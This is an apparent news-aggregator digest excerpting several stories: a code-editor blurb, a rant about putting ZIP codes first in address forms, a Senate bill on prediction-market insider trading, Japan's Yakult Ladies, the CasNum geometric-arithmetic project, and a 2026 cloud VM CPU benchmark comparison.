10 interesting stories served every morning and every evening.
Bridge the gap between coding intent and action: manipulate syntax structures directly, avoiding mouse or keyboard gymnastics. Amplify your coding efficiency: wield multiple cursors for parallel syntax node operations, revolutionizing bulk edits and refactoring.Selection Modes standardize movements across words, lines, syntax nodes, and more, offering unprecedented flexibility and consistency.
...
Read the original on ki-editor.org »
A US ZIP code is 5 characters. From those 5 characters you can determine the city, the state, and the country. That’s 3 fields. Autofilled. From one input.
But you don’t do that, do you? No. You make me type my street address, then my city, then scroll through a dropdown of 50 states to find Illinois wedged between Idaho and Indiana, then type my ZIP, then — the pièce de résistance — scroll through 200+ countries to find United States, which half the time is filed under “T” because some dipshit thought “The United States of America” was the correct sort key.
It’s 2026. What the fuck are we doing.
I type 90210. You now know I’m in Beverly Hills, California, United States. You didn’t need me to tell you that. You didn’t need a dropdown. You didn’t need me to scroll past Turkmenistan. You had the answer the entire time, in 5 digits, and you just… didn’t use it.
And here’s the bonus: once you know the ZIP, your street address autocomplete is searching a few thousand addresses instead of 160 million. It’s faster. It’s more accurate. I type less. You get cleaner data. Everyone wins.
This is not new technology. Free APIs exist. It’s like 4 lines of code. Look:
const res = await fetch(`https://api.zippopotam.us/us/${zip}`)
const data = await res.json()
city.value = data.places[0][“place name”]
state.value = data.places[0][“state”]
country.value = “United States”
That’s it. That’s the whole thing. You could have shipped this instead of reading this website.
See how that works? See how you typed 5 numbers and 3 fields filled themselves in? See how you’re now typing your street address and it already knows what city you’re in? That’s not magic. That’s a lookup table. We’ve had those since the 1960s.
Tier 1: ZIP at the bottom. Street, city, state, ZIP, country. You had the data to autofill 3 fields and you just… put it last. Amazon does this. Target does this. Walmart does this. Basically everyone does this. Billions of collective hours of human life, spent scrolling for “Illinois.”
Tier 2: No autofill at all. You collect the ZIP. You have the ZIP. You do nothing with it. The ZIP just sits there in your database, inert, like a fire extinguisher in a glass case that says “do not break.” What are you saving it for.
Tier 3: The scrollable country dropdown. 240 countries. No search. No type-ahead. Just pure, unfiltered, alphabetical scrolling. Bonus points if the US is under “T.” Extra bonus points if it’s not even alphabetical. You absolute psychopaths.
Tier 4: The form that resets when you hit back. I filled out 14 fields. Your payment processor failed. I hit back. Everything is gone. My street. My city. My state. My will to live. All of it. Returned to the void. The developer responsible for this sleeps eight hours a night. That’s the part that haunts me.
While we’re here:
Invoke the right keyboard. If you’re asking for a ZIP code, use inputmode=“numeric”. It’s one HTML attribute. On mobile, I should see a number pad, not a full QWERTY keyboard. This applies to phone numbers, credit cards, and anything else that’s obviously just digits. You already know the input type. Tell the phone.
Work with autofill, not against it. Browsers have had autofill for over a decade. Use the right autocomplete attributes — postal-code, address-line1, country. If your form fights the browser’s autofill, your form is wrong. The browser is trying to save your user 45 seconds. Let it.
Fine, maybe country first. The purists in the comments are technically correct — postal codes aren’t globally unique. You could do country first (pre-filled via IP), then postal code, then let the magic happen. The point was never “skip the country field.” The point is: stop making me type things you already know.
Found a site that puts the ZIP code last? A country dropdown sorted by vibes? A form that makes you cry?
Send it to us →
Put the ZIP code first. Autofill the city. Autofill the state. Autofill the country. Let the user type their street address last, with autocomplete scoped to their ZIP.
It is a solved problem. The API is free. The code is 5 lines. There is genuinely no reason not to do this other than the mass institutional inertia of a million product managers copy-pasting the same address form template from 2009 and never once asking “wait, why is the ZIP code at the bottom?”
Why is the ZIP code at the bottom?
Put it first, you animals.
Tweet this ·
Post to HN ·
Copy link
Share this before you have to fill out another address form.
...
Read the original on zipcodefirst.com »
Effort comes after reports of individuals suspiciously earning massive payouts before Iran Strikes, Venezuela Military Actions
Washington, D. C. — Today, Oregon’s U.S. Senator Jeff Merkley and Minnesota’s U.S. Senator Amy Klobuchar launched a new effort to prevent government officials at the highest levels from engaging in prediction markets, cracking down on the potential for any insider trading.
Following multiple public reports on the growing influence of prediction markets and their potential for corruption, Merkley and Klobuchar introduced the End Prediction Market Corruption Act—a new bill to ban the President, Vice President, Members of Congress, and other public officials from trading event contracts. The bill will ensure that federal elected officials maintain their oath of office to serve the people by preventing them from trading on information that they gained through their role.
“When public officials use non-public information to win a bet, you have the perfect recipe to undermine the public’s belief that government officials are working for the public good, not for their own personal profits,” said Merkley. “Perfectly timed bets on prediction markets have the unmistakable stench of corruption. To protect the public interest, Congress must step up and pass my End Prediction Market Corruption Act to crack down on this bad bet for democracy.”
“At the same time that prediction markets have seen huge growth, we have seen increasing reports of misconduct. This legislation strengthens the Commodity Futures Trading Commission’s ability to go after bad actors and provides rules of the road to prevent those with confidential government or policy information from exploiting their access for financial gain,” said Klobuchar.
Merkley and Klobuchar’s End Prediction Market Corruption Act is cosponsored by U. S. Senators Chris Van Hollen (D-MD), Adam Schiff (D-CA), and Kirsten Gillibrand (D-NY).
Their bill is supported by Public Citizen, Citizens for Responsibility and Ethics in Washington (CREW), and Project On Government Oversight (POGO).
“The American people deserve unwavering ethical standards from their government officials. Officials have a responsibility to avoid not only actual conflicts of interest but even the appearance of impropriety. POGO is pleased to endorse the End Prediction Market Corruption Act, which will further prohibit covered government officials from exploiting nonpublic information for personal gain in prediction markets,” said Janice Luong, Policy Associate for the Project On Government Oversight (POGO).
“It is now more important than ever that prediction markets be governed by ethical constraints, especially when it comes to bets placed by governmental officials. Sen. Merkley’s legislation would appropriately prohibit key government officials from buying or selling on the prediction markets contracts in which they could have insider information on changes in the market. Public Citizen heartily endorses this bill,” said Craig Holman, Ph. D., Public Citizen.
“The rapid rise of retail prediction markets creates the risk that officials across the government could use nonpublic information to trade on and profit off event contracts,” said Debra Perlin, Vice President of Policy of Citizens for Responsibility and Ethics in Washington (CREW). “The American people must be able to trust that their government officials are working on their behalf rather than for personal gain. Senator Merkley’s legislation represents a vital step forward to ensure that those in positions of power, including senior executive branch officials and members of Congress, cannot abuse their access to nonpublic information in order to profit.”
Merkley has been a long-time leader in the push to end public corruption. He has led the charge to crack down on election gambling and dark money in politics, prevent lawmakers from trading stocks, and ban cryptocurrency-related corruption by elected officials at the highest levels of the federal government.
Full text of the End Prediction Market Corruption Act can be found by clicking here.
...
Read the original on www.merkley.senate.gov »
As loneliness deepens in one of the world’s fastest-ageing nations, a network of women delivering probiotic milk drinks has become a vital source of routine, connection and care.
A woman in a neat navy suit and powder-blue shirt cycles purposefully down a quiet residential street in Tokyo. It’s 08:30 but already balmy, and she’s grateful for the matching visor that shields her eyes from the summer sun.
She arrives at her first stop, parks her bike and knocks on the door of a small wooden house with potted plants flanking the entrance. Inside, an elderly woman waits. Her face breaks into a broad smile as she opens the door — she has been expecting this visit.
Japan is the world’s most rapidly ageing major economy. Nearly 30% of its population is now over 65, and the number of elderly people living alone continues to rise. As families shrink and traditional multi-generational households decline, isolation has become one of the country’s most pressing social challenges.
The suited woman is a Yakult Lady — one of tens of thousands across Japan who deliver the eponymous probiotic drinks directly to people’s homes. On paper they’re delivery workers, but in practice they’re part of the country’s informal social safety net. In a country grappling with a rapidly ageing population and a deepening loneliness crisis, Yakult Ladies have become an unlikely source of community, helping to reduce the problem of isolation one drop-off at a time.
With their distinctive squat plastic bottles and shiny red caps, Yakult pioneered a genre. The probiotic drink was launched in Japan 90 years ago — long before “microbiome” became common parlance. But today, the women who deliver them are as important to the brand’s identity as the product itself.
...
Read the original on www.bbc.com »
CasNum (Compass and straightedge Number) is a library that implements arbitrary precision arithmetic using
compass and straightedge constructions. Arbitrary precision arithmetic, now with 100% more Euclid. Featuring a functional modified Game Boy emulator where every ALU opcode is implemented entirely through geometric constructions.
This project began with a simple compass-and-straightedge ‘engine’, which can be found under the directory cas/. In compass-and-straightedge constructions, one start with just two points: The origin, and a unit. Exactly as God intended. The engine then allows us to do what the ancients did:
* Construct the line through two points
* Construct the circle that contains one point and has a center at another point
* Construct the point at the intersection of two (non-parallel) lines
* Construct the one or two points in the intersection of a line and a circle (if they intersect)
* Construct the one point or two points in the intersection of two circles (if they intersect) (Which, by the way turns out to be a nasty 4th degree equation. Check out the formula in circle.py, over 3600 characters, yikes. Good thing we have WolframAlpha).
These five constructions are considered the basic compass and straightedge constructions. Think of these as your ISA.
On top of the compass-and-straightedge engine, we have the CasNum class. In CasNum, a number x is represented as the point (x,0) in the plane. Now, the fun part: implementing all arithmetic and logical operations. We can construct the addition of two points by finding the midpoint between them and doubling it, which are both standard compass-and-straightedge constructions. Then, we can build the product and quotient of numbers using triangle similarity. The logical operations (AND, OR, XOR) are a little uglier, since they are not a “clean algebraic operation” in the relevant sense, but, hey, it works right?
What I thought was pretty neat is that implementing all this from scratch leaves a lot of room for optimization. For example, multiplication by 2 can be implemented much more efficiently than the generic algorithm for multiplication using triangle similarity. Then, implementing modulo by first removing the highest power of two times the modulus from the dividend yielded much better results than the naive implementation.
* Integrate into the ALU of a Game Boy emulator, thus obtaining a Game Boy that arithmetically and logically runs solely on compass and straightedge constructions
The first two examples were actually implemented and can be found under the examples/ directory. So apparently one cannot square the circle
using a compass and a straightedge, but at least one can run Pokémon Red. Man, I’m sure the ancient Greeks would have loved to see this.
Thanks to the great code written by PyBoy, integrating CasNum within it was pretty seamless. The only file I needed to edit was opcodes_gen.py, and the edit was pretty minimal.
As always, please save any important work before running anything I ever write.
To clone the repo, and install requirements:
git clone –recursive git@github.com:0x0mer/CasNum.git
cd CasNum
pip install -r requirements.txt
You can run the rsa and basic examples from the repo’s root directory like so:
python3 -m examples.basic
python3 -m examples.rsa
The library comes with a viewer (casnum/cas/viewer.py) that shows the compass and straightedge constructions. It has an automatic zoom that kinda works, but it goes crazy in the rsa example, so you may want to use manual zoom there.
In order to run PyBoy, first you need a ROM. In order to avoid copyright infringement, I included the ROM for 2048, free to distribute under the zlib license. But if, for example, the ROM you have is ‘Pokemon.gb’, then you can place it in examples/Pyboy and run:
cd examples/PyBoy
pip install -r requirements.txt
PYTHONPATH=../.. python
Then, once in python, run:
from pyboy import PyBoy
from casnum import viewer
viewer.start()
pyboy = PyBoy(‘2048.gb’) # Or whatever ROM you have
while pyboy.tick():
pass
pyboy.stop()
the viewer.start() just displays the compass-and-straightedge constructions, it is not strictly needed, but it is fun.
Notice however that the first run of Pokemon on the Game Boy emulator takes approximately 15 minutes to boot, so playing it may require somewhat increased patience. You see, Euclid wouldn’t have optimized the Game Boy boot screen. He would have spent those 15 minutes in silent appreciation, thinking, “Yeah. That’s about how long that should take.”
After running it once, most calculations should already be cached if you run it from the same python interpreter instance, so on the second run you should be able to get a decent 0.5~1 FPS, which is totally almost playable.
Most modern developers are content with a + b. They don’t want to work for it. They don’t want to see the midpoint being birthed from the intersection of two circles.
CasNum is for the developer who believes that if you didn’t have to solve a 4th-degree polynomial just to increment a loop counter, you didn’t really increment it.
Python’s lru_cache is used to cache almost any calculation done in the library, as everything is so expensive. Memory usage may blow up, run at your own risk.
* pyglet (optional but highly recommended. Only needed if you want to display the
compass-and-straightedge constructions)
* pytest-lazy-fixtures (Only needed in order to run the tests)
* pycryptodome (Only needed if you want to run the rsa example)
A: It can’t really “run” anything, its a number.
A: Define “fast”. If you mean “faster than copying Euclid by hand”, then yes, dramatically.
Q: Why did you make this?
A: I wanted arbitrary precision arithmetic, but I also wanted to feel something.
The code in the root of this repository is licensed under the MIT License.
This project incorporates the following third-party materials:
PyBoy (Modified): Located in ./examples/PyBoy/. Distributed under the GNU Lesser General Public License (LGPL) v3.0.
Notice of Modification: This version of PyBoy has been modified from the original source code to use the CasNum library instead of Python’s int.
The original, unmodified source code for PyBoy can be found at: https://github.com/Baekalfen/PyBoy.
The full LGPL license text is available in ./examples/PyBoy/License.md.
* Notice of Modification: This version of PyBoy has been modified from the original source code to use the CasNum library instead of Python’s int.
* The original, unmodified source code for PyBoy can be found at: https://github.com/Baekalfen/PyBoy.
* The full LGPL license text is available in ./examples/PyBoy/License.md.
2048.gb: This Game Boy ROM binary is distributed under the zlib License.
Disclaimer: This software is provided ‘as-is’, without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software.
* Disclaimer: This software is provided ‘as-is’, without any express or implied warranty. In no event will the authors be held liable for any damages arising from the use of this software.
...
Read the original on github.com »
Time for the (not exactly) yearly cloud compute VM comparison. I started testing back in October 2025, but the benchmarking scope was increased, not just due to more VM families tested (44), but also due to testing the instances over more regions to attain a possible range of performance, as in many cases not all instances are created equal. I will not spoil much if I tell you that there is one new CPU that dominates the top-end results more clearly than any previous year.
Like last time, this is all about generic CPU performance and especially what you can actually get per $ spent on compute VM instances. Due to the focus on CPU workloads, burstable instances are not included. Single-thread performance is evaluated separately, as there are always workloads that cannot be further parallelized. For multi-thread, each instance type is tested in a 2vCPU configuration which is usually the minimum unit you can order (it corresponds to a single core for SMT-enabled systems, like all Intel and most AMD). The more threads your workload can utilize, the more multiples of that unit you can order.
The comparison should help you maximize performance or price depending on your requirements, by either using the optimal VM types of your provider, or perhaps by launching on a different provider.
If you don’t need all the details, you can use the TOC below to jump to what’s relevant to you.
I kept the same 7 providers as last year (which was down from my max 10 providers from the 2023 comparison), but expanded to 44 VM types tested.
New CPUs: AMD EPYC Turin (whose performance I had explored separately) and Intel Granite Rapids are available on the x86 front, while several new ARM solutions are tested: Google Axion (also explored separately last year), Azure Cobalt 100 and Ampere AmpereOne M.
More testing: Some extra benchmarks added. More testing across regions. In the past I only focused on that for small providers, but the big-three have also shown inconsistency, so the main performance and performance/price numbers will show a range.
As mentioned, I will focus on 2x vCPU instances, as that’s the minimum scalable unit for a meaningful comparison (and generally minimum for several VM types), given that most AMD and Intel instances use Hyper-Threading (HT) / Simultaneous Multi Threading (SMT). So, for those systems a vCPU is a Hyper-Thread, or half a core, with the 2x vCPU instance giving you a full core with 2 threads. This will become clear in the scalability section.
I am skipping some very old instance types that are obviously uncompetitive. I am still trying to configure at 2GB/vCPU of RAM (which is variably considered as “compute-optimized”, or “general-purpose”) and 30GB SSD (not high-IOPS) boot disk for the price comparison to make sense (exceptions will be noted).
The pay-as-you-go/on-demand prices refer to the lower cost region in the US (or Europe). For providers with variable pricing, cheapest regions are almost always in the US. Unlike last year, I will not include the 100% sustained discounts for GCP, as they are not technically on-demand so I may have been unfair to other providers.
For providers that offer 1 year and 3 year committed/reserved discounted prices, the no-downpayment price was listed with that option. The prices were valid for January 2026 - please check for current prices before making final decisions.
As a guide, here is an overview of the various generations of AMD, Intel and ARM CPUs from older (top) to newer (bottom), roughly grouped horizontally in per-core performance tiers, based on this and the previous comparison results:
This should immediately give you an idea of roughly what performance tier to expect based on the CPU type alone, with the important note that for SMT-enabled instances you get a single core for every 2x vCPUs.
A general tip is that you should avoid old CPU generations, as due to their lower efficiency (higher running costs) the cloud providers will actually charge you more for less performance. I will even not include types that were already too old to provide good value last year, to focus on the more relevant products.
Amazon Web Services (AWS) pretty much originated the whole “cloud provider” business - even though smaller connected VM providers predated it significantly (e.g. Linode comes to mind) - and still dominates the market. The AWS platform offers extensive services, but, of course, we are only looking at their Elastic Cloud (EC2) VM offerings for this comparison.
There are 2 new CPUs introduced since last year. Intel’s Granite Rapids makes an appearance, while the AMD EPYC Turin-powered C8a follows the previous C7a in having SMT disabled (providing a full core per vCPU). I don’t want to spoil much, but if you take the fastest CPU by a margin, and disable SMT, expect some impressive “per-2vCPU” results…
With EC2 instances you generally know what you are getting (instance type corresponds to specific CPU), although there’s a multitude of ways to pay/reserve/prepay/etc which makes pricing very complicated, and pricing further varies by region (I used the lowest cost US regions). In the 1Y/3Y reserved prices listed, there is no prepayment included - you can lower them a bit further if you do prepay. The spot prices vary even more, both by region and are updated often (especially for newly introduced types), so you’d want to keep track of them.
* min_cpu_platform needs to be set to get tested CPU.
** Extrapolated 2x vCPU instance - type requires 4x vCPU minimum size.
The GCP Platform (GCP) follows AWS quite closely, providing mostly equivalent services, but lags in market share (3rd place, after Microsoft Azure). We are looking at the Google Compute Engine (GCE) VM offerings, which is one of the most interesting in respect to configurability and range of different instance types. However, this variety makes it harder to choose the right one for the task, which is exactly what prompted me to start benchmarking all the available types. To add extra confusion, some types may come with an older (slower) CPU if you don’t set min_cpu_platform to the latest available for the type - so you need the extra configuration to get a faster machine for the same price.
This year, we have the addition of the AMD EPYC Turin (c4d and n4d), they are not yet in all regions/zones, but availability is expanding. We also had the introduction of two Intel-based 4th gen instances (n4 and c4). They both feature Emerald Rapids, however the latter can be configured with a local SSD, in which case they come with the newer Intel Granite Rapids. Until GCP allows setting min_cpu_platform to Granite Rapids (they are thinking about it AFAIK), you have to pay for the extra SSD to get the performance. Last year I covered separately the introduction of the Google Axion - powered c4a ARM type, but it is on a full VM comparison for the first time.
At this point, I should mention that the reason I did more extensive testing this year across different regions is the disappointing performance of Emerald Rapids in practice, compared to its showing on my original benchmarks. It seems that as it started to get used, exhibited a performance variance that looks consistent with boost behavior + node contention (i.e. more sensitive to noisy neighbors). I suspect this is why GCP offers the option to turn boost clock off in Emerald Rapids instances for “consistent performance”.
GCP prices vary per region and feature some strange patterns. For example when you reserve, t2d instances which give you a full AMD EPYC core per vCPU and n2d instances which give you a Simultaneous Multi-Thread (i.e. HALF a core) per vCPU have the same price per vCPU, but n2d is cheaper on demand and gets a 20% discount for sustained monthly use.
Note that c3, c3d and c4-lssd types have a 4x vCPU minimum. This breaks the price comparison, so I am extrapolating to a 2x vCPU price (half the cost of CPU/RAM + full cost of 30GB SSD). GCP gives you the option to disable cores (you select “visible” cores), so while you have to pay for 4x vCPU minimum, you can still run benchmarks on a 2x vCPU instance for a fair comparison.
Azure is the #2 overall Cloud provider and, as expected, it’s the best choice for most Microsoft/Windows-based solutions. That said, it does offer many types of Linux VMs, with quite similar abilities as AWS/GCP. The various types are not easy to use as on AWS/GCP though, for some reason even enterprise accounts start with zero quota on many types, so I had to request quota increases to even test tiny instances.
The v6 instances are new for the comparison, featuring AMD EPYC Genoa, Intel Emerald Rapids and Azure’s own Cobalt 100 ARM CPU.
The Azure pricing is at least as complex as AWS/GCP, plus the pricing tool seems worse. They also lag behind the other two major providers in CPU releases - Turin and Granite Rapids are still in closed preview at the time of writing this.
Oracle Cloud Infrastructure (OCI) was the biggest surprise in my 2023 comparison test. It was a pleasant surprise, not only does Oracle offer by far the most generous free tier (credits for the A1 type ARM VM credits equivalent to sustained 4x vCPU, 24GB RAM, 200GB disk for free, forever), their paid ARM instances were the best value across all providers - especially for on-demand. The free resources are enough for quite a few hobby projects - they would cost you well over $100/month in the big-3 providers.
Note that registration is a bit draconian to avoid abuse, make sure you are not on a VPN and also don’t use oracle anywhere in the email address you use for registration. You start with a “free” account, which gives you access to a limited selection of services and apart from the free-tier eligible A1 VMs, you’ll struggle to build any other types with the free credit you get at the start.
Upgrading to a regular paid account (which still gives you the free tier credits), you get a selection of VMs. New this year are the AMD EPYC Turin Standard. E6 VMs and the next generation ARM Standard.A4 type powered by the AmpereOne M CPU. If you recall from last year, the AmpereOne A2 instances were slower in quite a few tasks than the older Altra A1. Ampere really needed a step forward, and AmpereOne M (A4) finally delivers meaningful gains in this year’s dataset. I had trouble building older-gen AMD instances, so in the end I did not include them. I also could only build Standard.A4 in one region (Ashburn), even though I tried in Phoenix which Oracle had in the availability list, to no avail.
Oracle Cloud’s prices are the same across all regions, which is nice. They do not offer any reserved discounts, but do offer a 50% discount for preemptible (spot) instances. One complication is that their prices are per “Oracle CPU” (OCPU). This seemed to make sense originally, as it corresponded to physical cores - the A1 instances had 1 OCPU per core, so 1 OCPU = 1 vCPU, while SMT x86 had 1 OCPU = 2 vCPU (threads). But then, possibly thinking that their users are getting comfortable with it, they threw a wrench by making 1 OCPU for newer (still non-SMT) ARM types A2 and A4 be equal to 2 vCPU / 2 full Cores. I can’t think of a reason for this other than to confuse their customers.
Linode, the venerable cloud provider (predating AWS by several years), has now been part of Akamai for a few years.
From the previous years we saw that their shared core types (“Linodes”) are the best bang for buck, but it depends on what CPU you are assigned on creation. It seems that currently the most common configuration features an AMD EPYC Milan. I tried to build quite a few and that’s what you usually get (if you manage to build an ancient Intel or AMD Rome, try again), I did not see any newer CPUs pop up. The latest EPYC Turin though is available as a dedicated CPU instance. They now mark dedicated instances with their generation, so a G8 should always be the same CPU. As always, the dedicated instances come with SMT, so you are normally getting a core per 2 vCPUs, while the shared instances are virtual cores, so twice the vCPUs gives you twice the multi-thread performance - the caveat is that performance per thread varies depending on how busy the node that holds your VM is.
It is a bit of an annoyance that without testing your VM after creation you can’t be sure of what performance to expect, unless you go for the more expensive dedicated VMs, but otherwise, Akamai/Linode is still easy to set up and maintain and has fixed, simple pricing across regions.
DigitalOcean was close to the top of the perf/value charts a few years ago, providing the best value with their shared CPU Basic “droplets”. I am actually using DigitalOcean droplets to help out by hosting a free weather service called 7Timer, so feel free to use my affiliate link to sign up and get $200 free - you will help with the free project’s hosting costs if you end up using the service beyond the free period. Apart from value, I chose them for the simplicity of setup, deployment, snapshots, backups.
However, they seem to have stopped upgrading their fleet for quite a while now, so you end up with some very old CPUs. If you don’t mind the low per-thread performance, they are still not a bad value, given the low prices. I like their simple, region-independent and stable pricing structure, but I wish they would upgrade their shared core data centers.
Hetzner is a quite old German data center operator and web host, with a very budget-friendly public cloud offering. They are often recommended as a reliable extra-low-budget solution, and I’ve had much better luck with them than other similar providers.
On the surface, their prices seem to be just a fraction of those of the larger providers, so I did extended benchmark runs over days to make sure there is no significant oversubscribing - except perhaps the cheapest variant (CX23). Only the CCX13 claims dedicated cores. Ironically, those dedicated instances vary significantly in performance depending on which data center you create them in. In the end, the CPX22 (AMD) and CAX11 (ARM) shared core instances are the most stable in performance across instances and regions.
Note that the cheap shared-core types are not widely available, not found in the US regions and they even show no availability at times in the European regions. And while I included a CX23 with EPYC Rome, you will normally get a slower Skylake. I will not include the shared instances in the price/performance charts this time around, as I am thinking that the limited availability does not make them equal contenders.
In order to have much more test runs, I streamlined the test suite into a docker image which you can run yourself. Almost all instances were on 64bit Debian 13, although I had to use Ubuntu 24.04 on a couple, and Oracle’s ARM were only compatible with Oracle Linux. To run the entire suite on a system with docker you would do:
As every year, the main weight is on my my own benchmark suite, which you can now also run on its own docker image. It has both proven very good at approximating real-world performance differences in the type of workloads we use at SpareRoom, and is also good at comparing single and multi-threaded performance (with scaling to hundreds of threads if needed). To run DKbench by itself on a system with docker:
I created multiple instances in different regions and recorded min and max of all runs (both single-thread and dual-thread).
I have kept Geekbench, both because it can help you compare results from previous years and because Geekbench 6 seems to be much worse - especially in multi-threaded testing (I’d go as far to say it looks broken to me).
I simply kept the best of 2 runs, you can browse the results here. There’s an Arm version too at https://cdn.geekbench.com/Geekbench-5.4.0-LinuxARMPreview.tar.gz.
Apart from being popular, Phoronix benchmarks can help benchmark some specific things (e.g. AVX512 extensions) and also results are openly available.
Very common application and very common benchmark - average compression/decompression scores are recorded.
Select option 1. This benchmark uses SSE/AVX up to AVX512, which might be important for some people. Older CPUs that lack the latest extensions are at a disadvantage.
Blender’s Big Buck Bunny video was transcoded to an H264 mp4 via FFmpeg, both in single and dual-thread mode.
The raw results can be accessed on this spreadsheet (or here for the full Geekbench results).
In the graphs that follow, the y-axis lists the names of the instances, with the CPU type in parenthesis:
Single-thread performance can be crucial for many workloads. If you have highly parallelizable tasks you can add more vCPUs to your deployment, but there are many common types of tasks where that is not always a solution. For example, a web server can be scaled to service any number of requests in parallel, however the vCPU’s thread speed determines the minimum response time of each request.
We start with the latest DKbench, running the 19 default benchmarks (Perl & C/XS) which cover a variety of common server workloads. I tried to build 2-3 instances at different times across at least 3 regions (if the provider allowed), to get a min/max range of performance. Here are the results for single thread:
I think it’s the first time in my series of comparisons where a CPU had this clear of a performance lead. AMD’s EPYC Turin is simply a tier above anything else. AWS has the fastest setup with that CPU, while GCP’s more expensive C4d seems to vary a lot in performance when their own, cheaper N4d gave more consistent results. Overall, if you are looking for maximum performance per thread, EPYC Turin seems to be the answer if your cloud provider has it.
In the 2024 comparison Intel Emerald Rapids did quite well, but it turns out that is only on non-busy nodes, where the cpu allows for a generous boost - at least for GCP. This is reflected as the range you see on the graph. The new Granite Rapids seems to fix this, providing a bit higher, but mainly more stable performance. So, a solid step forward from Intel, it’s just that Turin is really impressive.
As we are waiting for AWS to release Graviton5 publicly, GCP’s Axion is the leader for ARM solutions, impressively offering EPYC Genoa-level performance per thread. I tested Azure’s own Cobalt 100 for the first time - it sits between Graviton3 and Graviton4 performance. Ampere’s new AmpereOne M finally offers some tangible improvement over the aging Altra, but only matches AWS’s older Graviton3.
Lastly, among the lower-cost providers, DigitalOcean has lagged behind in performance, signaling that their fleet is due for an upgrade. Both Akamai and Hetzner offer some fast Milan instances, although for both providers you are not guaranteed what performance level you are going to get when creating an instance - there is the variation shown in the chart. It’s not oversubscribing, the performance is stable, it’s just that groups of servers are setup differently.
DKbench runs the benchmark suite single-threaded and multi-threaded (2 threads in this comparison as we use 2x vCPU instances) and calculates a scalability percentage. The benchmark obviously uses highly parallelizable workloads (if that’s not what you are running, you’d have to rely more on the single-thread benchmarking). In the following graph 100% scalability means that if you run 2 parallel threads, they will both run at 100% speed compared to how they would run in isolation. For systems where each vCPU is 1 core (e.g. all ARM systems), or for “shared” CPU systems where each vCPU is a thread among a shared pool, you should expect scalability near 100% - what is running on one vCPU should not affect the other when it comes to CPU-only workloads.
Most Intel/AMD systems though give you a single core that has 2x threads (Hyper-Threads / HT in Intel lingo - or Simultaneous Multi Threads / SMT if you prefer) as a 2x vCPU unit. Those will give you scalability well below 100%. A 50% scalability would mean you have the equivalent of just 1x vCPU, which would be very disappointing. Hence, the farther up you are from 50%, the more performance your 2x vCPUs give you over running on a single vCPU.
As expected, the ARM and shared CPUs are near 100%, i.e. you are getting twice the multithreaded performance going from 1x to 2x vCPUs. You also get that from three x86 types: AWS’s Genoa C7a and Turin C8a alongside GCP’s older Milan t2d.
From the rest we note that, traditionally, AMD does SMT better than Intel, although the latter has improved from the dismal Ice Lake days when it barely managed over 50%.
Bizarrely, the Akamai AMD Turin give an unusually high (given SMT) scalability of 71.9%. I have verified the result several times, and I can’t figure out what their setup is - the single-threaded performance at the same time is very low compared to every other Turin.
From the single-thread performance and scalability results we can guess how running DKbench multithreaded will turn out, but in any case here it is:
Give the clearly fastest instance two full cores instead of threads and you get the Turin-powered AWS C8a completely dominating the chart. Interestingly, the Google Axion seems at least as good here as the leader from the previous comparison, the Genoa C7a - with Graviton4 very close and Cobalt 100 trailing not far behind.
The SMT-enabled Turin instances follow, with the Top-10 completing with the venerable Milan in a non-SMT Tau instance. Long time followers of these comparisons may remember this was the top of the chart in the 2023 edition.
At the bottom, as expected we have very old Intel Broadwell/Skylake not-as-old Ice Lake and AMD Rome.
The old Geekbench 5 is provided for comparison reasons (and I don’t trust Geekbench 6):
Both for single and multi-core, the results are very close to what we get with DKbench. Which is a good thing, as both suites try a range of benchmarks to get a balanced generic CPU score.
Moving on to some popular specific benchmarks - starting with 7zip which is sensitive to memory latency and cache:
While Turin still leads overall, Axion and Graviton4 are impressive and actually even beat it in the decompress part of the benchmark. In fact, Cobalt 100 is the top performer for decompression, but overall the ARM solutions show great performance.
Another Turin showcase, with the non-SMT AWS C8a in particular almost doubling the score of the second and tripling the score of the C7a. Granite Rapids is also making a great showing.
It’s the first time I am running this popular benchmark, and I am a bit puzzled about some of the Milan types coming last.
Another first for this comparison is video compression using FFmpeg and libx264. Results for both single and dual-thread mode:
Once more, EPYC Turin comes first. If we look at single-thread performance only Granite Rapids comes somewhat close. When using 2 full cores Axion can pull ahead of all SMT (i.e. single core) instances except Turin.
Lastly, in case you have software that can be accelerated by AVX512, I am including an OpenSSL RSA4096 benchmark. They are Intel’s extensions so they are on all their CPUs since Skylake, whereas Genoa was the first AMD CPU to implement them. Older AMD CPUs and ARM architectures will be at a disadvantage in this benchmark:
Like in our previous comparison, AMD outperforms Intel at their own game. It’s quite a margin for Turin and even Genoa is ahead of anything Intel. Intel does not seem to be prioritising vector performance, as even the latest Granite Rapids does not bring much improvement over the aging Ice Lake.
As expected, ARM and older AMD CPUs that don’t support AVX512 are slower than Intel Skylake and newer.
One factor that is often even more important than performance itself is the performance-to-price ratio.
I will start with the “on-demand” price quoted by every provider. While I listed monthly costs on the tables, these prices are actually charged per minute or hour, so there’s no need to reserve for a full month.
The first chart is for single-thread performance/price. I will have to separate Hetzner’s shared instances because they are not available in the US and sometimes run out even in Europe (esp. CX23), so I feel they are not exact competition - CCX13 though is available and is included.
Hetzner and Oracle top the list like last year. However, thanks to the incredible performance of Turin, Oracle pretty much matches Hetzner’s dedicated instance in performance to cost. They are followed by Linode and also GCP’s n4d. The latter, again thanks to the leading single-thread performance of AMD’s latest CPU even manages to bring better value than DigitalOcean, which is then followed by in-house ARM solutions like Google Axion and Azure Cobalt 100.
AWS is definitely the worst value on-demand. Their Turin is the best they can do, while their previous gen and older CPUs are the worst values on the table. Unlike the previous comparison, even Azure seems to do better in value.
At this point I think we should see the limited availability Hetzner VMs in comparison to the best value dedicated:
The inexpensive shared-cpu types offer unbeatable value - if you manage to get them. The top one overall (Rome CX23) is actually the hardest to provision, as the CX23 type usually gives you a slow Skylake.
Moving on to 2x threads for evaluating multi-threaded performance:
All the non-SMT VMs get a bump here, hence Oracle’s ARM take the lead with the new AmpereOne M, with Hetzner and shared core Linode following closely. The second tier consists of Google Axion and Azure Cobalt 100, as well as DigitalOcean droplets. AWS’s non-SMT Turin is not that far behind this time, although their older gen 5/6 x86 are again at the very bottom of the chart.
The Hetzner shared-core instances get the bump as well, they provide superb on-demand value compared to the competition:
The three largest (and most expensive) providers offer significant 1-year reservation discounts. To get the maximum discount you have to lock into a specific VM type, which is why it is extra important to know what you are getting out of each. Also, for AWS you can actually automatically apply the 1 year prices to most on-demand instances by using third party services like DoIT’s Flexsave (included in their free tier!), so this segment may still be relevant even if you don’t want to reserve.
The first chart is again for single-thread performance/price.
